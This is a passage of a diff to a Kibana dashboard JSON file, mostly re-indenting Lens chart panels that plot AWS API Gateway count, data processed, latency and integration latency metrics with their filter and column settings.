"aws.dimensions.Stage", + "negate": false, + "type": "exists", + "value": "exists" }, - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Stage", - "index": "metrics-*", - "key": "aws.dimensions.Stage", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Stage" - } + "query": { + "exists": { + "field": "aws.dimensions.Stage" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Resource", - "index": "metrics-*", - "key": "aws.dimensions.Resource", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Resource" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Resource", + "index": "metrics-*", + "key": "aws.dimensions.Resource", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Resource" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Method", - "index": "metrics-*", - "key": "aws.dimensions.Method", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Method" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Method", + "index": "metrics-*", + "key": "aws.dimensions.Method", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Method" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Route", - "index": "metrics-*", - "key": "aws.dimensions.Route", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Route" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Route", + "index": "metrics-*", + "key": "aws.dimensions.Route", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Route" } } - ], - "relation": "AND", - "type": "combined" - }, - "query": {} - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "11242c77-c1e8-482f-a8ab-d14342367450" - ], - "layerId": "ff2c6fd1-df0b-409d-a7e7-033a129edba3", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "f87d2d15-ecd3-4cf3-85e5-911976418f35", - "xAccessor": "21bcc448-3bbc-4949-8471-40e126445935" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true + } + ], + "relation": "AND", + "type": "combined" }, - "valueLabels": "hide" + "query": {} } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "11242c77-c1e8-482f-a8ab-d14342367450" + ], + "layerId": "ff2c6fd1-df0b-409d-a7e7-033a129edba3", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "f87d2d15-ecd3-4cf3-85e5-911976418f35", + "xAccessor": "21bcc448-3bbc-4949-8471-40e126445935" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - "enhancements": {}, - "hidePanelTitles": false + "title": "", + "type": "lens", + "visualizationType": "lnsXY" }, - "title": "Count" + "enhancements": {}, + "hidePanelTitles": false }, - { - "version": "8.9.0", - "type": "lens", - "gridData": { - "h": 15, - "i": "e71f676d-e0d3-40a3-9439-34de613469f4", - "w": 24, - "x": 24, - "y": 7 - }, - "panelIndex": "e71f676d-e0d3-40a3-9439-34de613469f4", - "embeddableConfig": { - "attributes": { - "title": "", - "description": "", - "visualizationType": "lnsXY", - "type": "lens", - "references": [ - { - "type": "index-pattern", - "id": "metrics-*", - "name": "indexpattern-datasource-layer-da960427-d6bb-4f17-a5ac-9be25356186a" - } - ], - "state": { - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "53bb15bf-1d19-4aaa-be68-5015b194e60b" - ], - "layerId": "da960427-d6bb-4f17-a5ac-9be25356186a", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "c6eaba88-8446-4a94-b32b-e0f6cc784fc2", - "xAccessor": "7af933af-8c3e-47b8-9e15-9cd504966672" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yTitle": "" + "title": "Count" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "e71f676d-e0d3-40a3-9439-34de613469f4", + "w": 24, + "x": 24, + "y": 7 + }, + "panelIndex": "e71f676d-e0d3-40a3-9439-34de613469f4", + "embeddableConfig": { + "attributes": { + "title": "", + "description": "", + "visualizationType": "lnsXY", + "type": "lens", + "references": [ + { + "type": "index-pattern", + "id": "metrics-*", + "name": "indexpattern-datasource-layer-da960427-d6bb-4f17-a5ac-9be25356186a" + } + ], + "state": { + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "query": { - "language": "kuery", - "query": "" + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "filters": [ + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.apigateway.metrics.DataProcessed.avg", - "key": "aws.apigateway.metrics.DataProcessed.avg", - "negate": false, - "type": "exists" - }, - "query": { - "exists": { - "field": "aws.apigateway.metrics.DataProcessed.avg" - } - }, - "$state": { - "store": "appState" + "accessors": [ + "53bb15bf-1d19-4aaa-be68-5015b194e60b" + ], + "layerId": "da960427-d6bb-4f17-a5ac-9be25356186a", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "c6eaba88-8446-4a94-b32b-e0f6cc784fc2", + "xAccessor": "7af933af-8c3e-47b8-9e15-9cd504966672" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yTitle": "" + }, + "query": { + "language": "kuery", + "query": "" + }, + "filters": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.apigateway.metrics.DataProcessed.avg", + "key": "aws.apigateway.metrics.DataProcessed.avg", + "negate": false, + "type": "exists" + }, + "query": { + "exists": { + "field": "aws.apigateway.metrics.DataProcessed.avg" } }, - { - "meta": { - "alias": null, - "disabled": false, - "negate": false, - "params": [ - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.ApiId", - "index": "metrics-*", - "key": "aws.dimensions.ApiId", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.ApiId" - } + "$state": { + "store": "appState" + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "negate": false, + "params": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.ApiId", + "index": "metrics-*", + "key": "aws.dimensions.ApiId", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.ApiId" } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Stage", + "index": "metrics-*", + "key": "aws.dimensions.Stage", + "negate": false, + "type": "exists", + "value": "exists" }, - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Stage", - "index": "metrics-*", - "key": "aws.dimensions.Stage", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Stage" - } + "query": { + "exists": { + "field": "aws.dimensions.Stage" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Method", - "index": "metrics-*", - "key": "aws.dimensions.Method", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Method" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Method", + "index": "metrics-*", + "key": "aws.dimensions.Method", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Method" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Resource", - "index": "metrics-*", - "key": "aws.dimensions.Resource", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Resource" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Resource", + "index": "metrics-*", + "key": "aws.dimensions.Resource", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Resource" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Route", - "index": "metrics-*", - "key": "aws.dimensions.Route", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Route" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Route", + "index": "metrics-*", + "key": "aws.dimensions.Route", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Route" } } - ], - "relation": "AND", - "type": "combined" - }, - "query": {}, - "$state": { - "store": "appState" - } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {}, + "$state": { + "store": "appState" } - ], - "datasourceStates": { - "formBased": { - "layers": { - "da960427-d6bb-4f17-a5ac-9be25356186a": { - "columnOrder": [ - "c6eaba88-8446-4a94-b32b-e0f6cc784fc2", - "7af933af-8c3e-47b8-9e15-9cd504966672", - "53bb15bf-1d19-4aaa-be68-5015b194e60b" - ], - "columns": { - "53bb15bf-1d19-4aaa-be68-5015b194e60b": { - "dataType": "number", - "isBucketed": false, - "label": "Average of aws.apigateway.metrics.DataProcessed.avg", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } + } + ], + "datasourceStates": { + "formBased": { + "layers": { + "da960427-d6bb-4f17-a5ac-9be25356186a": { + "columnOrder": [ + "c6eaba88-8446-4a94-b32b-e0f6cc784fc2", + "7af933af-8c3e-47b8-9e15-9cd504966672", + "53bb15bf-1d19-4aaa-be68-5015b194e60b" + ], + "columns": { + "53bb15bf-1d19-4aaa-be68-5015b194e60b": { + "dataType": "number", + "isBucketed": false, + "label": "Average of aws.apigateway.metrics.DataProcessed.avg", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 0 } - }, - "scale": "ratio", - "sourceField": "aws.apigateway.metrics.DataProcessed.avg" + } }, - "7af933af-8c3e-47b8-9e15-9cd504966672": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" + "scale": "ratio", + "sourceField": "aws.apigateway.metrics.DataProcessed.avg" + }, + "7af933af-8c3e-47b8-9e15-9cd504966672": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" }, - "c6eaba88-8446-4a94-b32b-e0f6cc784fc2": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of aws.dimensions.ApiId + 1 other", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "53bb15bf-1d19-4aaa-be68-5015b194e60b", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "aws.dimensions.Stage" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "aws.dimensions.ApiId" - } + "scale": "interval", + "sourceField": "@timestamp" }, - "incompleteColumns": {}, - "sampling": 1 - } + "c6eaba88-8446-4a94-b32b-e0f6cc784fc2": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of aws.dimensions.ApiId + 1 other", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "53bb15bf-1d19-4aaa-be68-5015b194e60b", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "aws.dimensions.Stage" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.ApiId" + } + }, + "incompleteColumns": {}, + "sampling": 1 } } - }, - "internalReferences": [], - "adHocDataViews": {} - } - }, - "enhancements": {}, - "hidePanelTitles": false + } + }, + "internalReferences": [], + "adHocDataViews": {} + } }, - "title": "Data Processed" + "enhancements": {}, + "hidePanelTitles": false }, - { - "version": "8.9.0", - "type": "lens", - "gridData": { - "h": 15, - "i": "424aa31b-dcf7-4bde-8dc7-97f9fcf2bcc6", - "w": 24, - "x": 0, - "y": 22 - }, - "panelIndex": "424aa31b-dcf7-4bde-8dc7-97f9fcf2bcc6", - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "name": "indexpattern-datasource-layer-ff2c6fd1-df0b-409d-a7e7-033a129edba3", - "id": "metrics-*", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "ff2c6fd1-df0b-409d-a7e7-033a129edba3": { - "columnOrder": [ - "f87d2d15-ecd3-4cf3-85e5-911976418f35", - "21bcc448-3bbc-4949-8471-40e126445935", - "11242c77-c1e8-482f-a8ab-d14342367450" - ], - "columns": { - "11242c77-c1e8-482f-a8ab-d14342367450": { - "dataType": "number", - "isBucketed": false, - "label": "Average of aws.apigateway.metrics.Latency.avg", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 2, - "suffix": "ms" - } + "title": "Data Processed" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "424aa31b-dcf7-4bde-8dc7-97f9fcf2bcc6", + "w": 24, + "x": 0, + "y": 22 + }, + "panelIndex": "424aa31b-dcf7-4bde-8dc7-97f9fcf2bcc6", + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "name": "indexpattern-datasource-layer-ff2c6fd1-df0b-409d-a7e7-033a129edba3", + "id": "metrics-*", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ff2c6fd1-df0b-409d-a7e7-033a129edba3": { + "columnOrder": [ + "f87d2d15-ecd3-4cf3-85e5-911976418f35", + "21bcc448-3bbc-4949-8471-40e126445935", + "11242c77-c1e8-482f-a8ab-d14342367450" + ], + "columns": { + "11242c77-c1e8-482f-a8ab-d14342367450": { + "dataType": "number", + "isBucketed": false, + "label": "Average of aws.apigateway.metrics.Latency.avg", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": "ms" } - }, - "scale": "ratio", - "sourceField": "aws.apigateway.metrics.Latency.avg" + } }, - "21bcc448-3bbc-4949-8471-40e126445935": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" + "scale": "ratio", + "sourceField": "aws.apigateway.metrics.Latency.avg" + }, + "21bcc448-3bbc-4949-8471-40e126445935": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" }, - "f87d2d15-ecd3-4cf3-85e5-911976418f35": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of aws.dimensions.ApiId + 1 other", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "11242c77-c1e8-482f-a8ab-d14342367450", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "aws.dimensions.Stage" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "aws.dimensions.ApiId" - } + "scale": "interval", + "sourceField": "@timestamp" }, - "incompleteColumns": {}, - "sampling": 1 - } + "f87d2d15-ecd3-4cf3-85e5-911976418f35": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of aws.dimensions.ApiId + 1 other", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "11242c77-c1e8-482f-a8ab-d14342367450", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "aws.dimensions.Stage" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.ApiId" + } + }, + "incompleteColumns": {}, + "sampling": 1 } } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.apigateway.metrics.Latency.avg", - "key": "aws.apigateway.metrics.Latency.avg", - "negate": false, - "type": "exists" - }, - "query": { - "exists": { - "field": "aws.apigateway.metrics.Latency.avg" - } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "aws.apigateway.metrics.Latency.avg", + "key": "aws.apigateway.metrics.Latency.avg", + "negate": false, + "type": "exists" + }, + "query": { + "exists": { + "field": "aws.apigateway.metrics.Latency.avg" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "negate": false, - "params": [ - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.ApiId", - "index": "metrics-*", - "key": "aws.dimensions.ApiId", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.ApiId" - } + "meta": { + "alias": null, + "disabled": false, + "negate": false, + "params": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.ApiId", + "index": "metrics-*", + "key": "aws.dimensions.ApiId", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.ApiId" } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Stage", + "index": "metrics-*", + "key": "aws.dimensions.Stage", + "negate": false, + "type": "exists", + "value": "exists" }, - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Stage", - "index": "metrics-*", - "key": "aws.dimensions.Stage", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Stage" - } + "query": { + "exists": { + "field": "aws.dimensions.Stage" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Method", - "index": "metrics-*", - "key": "aws.dimensions.Method", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Method" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Method", + "index": "metrics-*", + "key": "aws.dimensions.Method", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Method" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Resource", - "index": "metrics-*", - "key": "aws.dimensions.Resource", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Resource" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Resource", + "index": "metrics-*", + "key": "aws.dimensions.Resource", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Resource" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Route", - "index": "metrics-*", - "key": "aws.dimensions.Route", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Route" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Route", + "index": "metrics-*", + "key": "aws.dimensions.Route", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Route" } } - ], - "relation": "AND", - "type": "combined" - }, - "query": {} - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "curveType": "CURVE_MONOTONE_X", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "11242c77-c1e8-482f-a8ab-d14342367450" - ], - "layerId": "ff2c6fd1-df0b-409d-a7e7-033a129edba3", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "f87d2d15-ecd3-4cf3-85e5-911976418f35", - "xAccessor": "21bcc448-3bbc-4949-8471-40e126445935" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true + } + ], + "relation": "AND", + "type": "combined" }, - "valueLabels": "hide" + "query": {} } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "CURVE_MONOTONE_X", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "11242c77-c1e8-482f-a8ab-d14342367450" + ], + "layerId": "ff2c6fd1-df0b-409d-a7e7-033a129edba3", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "f87d2d15-ecd3-4cf3-85e5-911976418f35", + "xAccessor": "21bcc448-3bbc-4949-8471-40e126445935" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - "enhancements": {}, - "hidePanelTitles": false + "title": "", + "type": "lens", + "visualizationType": "lnsXY" }, - "title": "Latency" + "enhancements": {}, + "hidePanelTitles": false }, - { - "version": "8.9.0", - "type": "lens", - "gridData": { - "h": 15, - "i": "21ea8ee2-05f0-4a71-a46a-fe4ab6c3db94", - "w": 24, - "x": 24, - "y": 22 - }, - "panelIndex": "21ea8ee2-05f0-4a71-a46a-fe4ab6c3db94", - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "name": "indexpattern-datasource-layer-ff2c6fd1-df0b-409d-a7e7-033a129edba3", - "id": "metrics-*", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "ff2c6fd1-df0b-409d-a7e7-033a129edba3": { - "columnOrder": [ - "f87d2d15-ecd3-4cf3-85e5-911976418f35", - "21bcc448-3bbc-4949-8471-40e126445935", - "11242c77-c1e8-482f-a8ab-d14342367450" - ], - "columns": { - "11242c77-c1e8-482f-a8ab-d14342367450": { - "dataType": "number", - "isBucketed": false, - "label": "Average of aws.apigateway.metrics.IntegrationLatency.avg", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 2, - "suffix": "ms" - } + "title": "Latency" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "21ea8ee2-05f0-4a71-a46a-fe4ab6c3db94", + "w": 24, + "x": 24, + "y": 22 + }, + "panelIndex": "21ea8ee2-05f0-4a71-a46a-fe4ab6c3db94", + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "name": "indexpattern-datasource-layer-ff2c6fd1-df0b-409d-a7e7-033a129edba3", + "id": "metrics-*", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ff2c6fd1-df0b-409d-a7e7-033a129edba3": { + "columnOrder": [ + "f87d2d15-ecd3-4cf3-85e5-911976418f35", + "21bcc448-3bbc-4949-8471-40e126445935", + "11242c77-c1e8-482f-a8ab-d14342367450" + ], + "columns": { + "11242c77-c1e8-482f-a8ab-d14342367450": { + "dataType": "number", + "isBucketed": false, + "label": "Average of aws.apigateway.metrics.IntegrationLatency.avg", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": "ms" } - }, - "scale": "ratio", - "sourceField": "aws.apigateway.metrics.IntegrationLatency.avg" + } + }, + "scale": "ratio", + "sourceField": "aws.apigateway.metrics.IntegrationLatency.avg" + }, + "21bcc448-3bbc-4949-8471-40e126445935": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" }, - "21bcc448-3bbc-4949-8471-40e126445935": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" + "scale": "interval", + "sourceField": "@timestamp" + }, + "f87d2d15-ecd3-4cf3-85e5-911976418f35": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of aws.dimensions.ApiId + 1 other", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "11242c77-c1e8-482f-a8ab-d14342367450", + "type": "column" }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "f87d2d15-ecd3-4cf3-85e5-911976418f35": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of aws.dimensions.ApiId + 1 other", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "11242c77-c1e8-482f-a8ab-d14342367450", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "aws.dimensions.Stage" - ], - "size": 10 + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" }, - "scale": "ordinal", - "sourceField": "aws.dimensions.ApiId" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } + "secondaryFields": [ + "aws.dimensions.Stage" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.ApiId" + } + }, + "incompleteColumns": {}, + "sampling": 1 } } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.apigateway.metrics.Count.sum", - "key": "aws.apigateway.metrics.Count.sum", - "negate": false, - "type": "exists" - }, - "query": { - "exists": { - "field": "aws.apigateway.metrics.Count.sum" - } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "aws.apigateway.metrics.Count.sum", + "key": "aws.apigateway.metrics.Count.sum", + "negate": false, + "type": "exists" + }, + "query": { + "exists": { + "field": "aws.apigateway.metrics.Count.sum" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.apigateway.metrics.IntegrationLatency.avg", - "key": "aws.apigateway.metrics.IntegrationLatency.avg", - "negate": false, - "type": "exists" - }, - "query": { - "exists": { - "field": "aws.apigateway.metrics.IntegrationLatency.avg" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.apigateway.metrics.IntegrationLatency.avg", + "key": 